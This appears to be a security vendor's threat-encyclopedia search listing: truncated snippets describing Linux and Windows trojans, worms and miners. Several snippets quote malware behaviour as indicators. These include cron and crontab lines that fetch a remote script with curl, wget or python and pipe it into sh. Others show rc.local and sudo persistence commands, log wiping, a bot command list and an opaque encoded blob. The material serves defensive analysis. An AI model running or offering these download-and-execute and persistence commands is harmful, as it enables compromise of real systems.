Keyword: usojan.sh.malxmr.uwejs
This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes the initially executed copy of itself.
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It modifies files, disabling programs and applications
Modifications This Trojan modifies the following file(s): /etc/rc.local - adds "sh /usr/local/bin/npt" to run downloaded file on boot /var/spool/mail/{user} - contents replaced with "0" string /var/log/wtmp -
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Worm arrives on a system as a file
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Worm arrives on a system as a file
Telnet connections on the following ports: 23 2323 It creates the following cronjob to download and execute 2.sh every 1 hour: * 1 * * * $LDR http://{BLOCKED}.{BLOCKED}.39.78/2.sh | sh > /dev/null
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
the server SH <command> - Executes a command ISH <command> - SH, interactive, sends to channel SHD <command> - Executes a psuedo-daemonized command INSTALL <http
\shell HKEY_CURRENT_USER\a01\shell\ open HKEY_CURRENT_USER\a01\shell\ open\command HKEY_CURRENT_USER\a01\shell\ runas HKEY_CURRENT_USER\a01\shell\ runas\command HKEY_CURRENT_USER\SH HKEY_CURRENT_USER\SH
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It modifies files, disabling programs and applications
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Trojan deletes itself after execution. Arrival Details This malware arrives via the following means: Downloaded by Trojan.SH.BROOTKIT.A Installation This Trojan adds the following folders:
This Trojan may be downloaded by other malware/grayware from remote sites. Arrival Details This Trojan may be downloaded by the following malware/grayware from remote sites: Trojan.SH.ETIN.A
* * * * (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh Path: /etc/crontab Schedule:
}SIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B Executes the following commands so that it will run upon boot: sudo sh -c "echo '#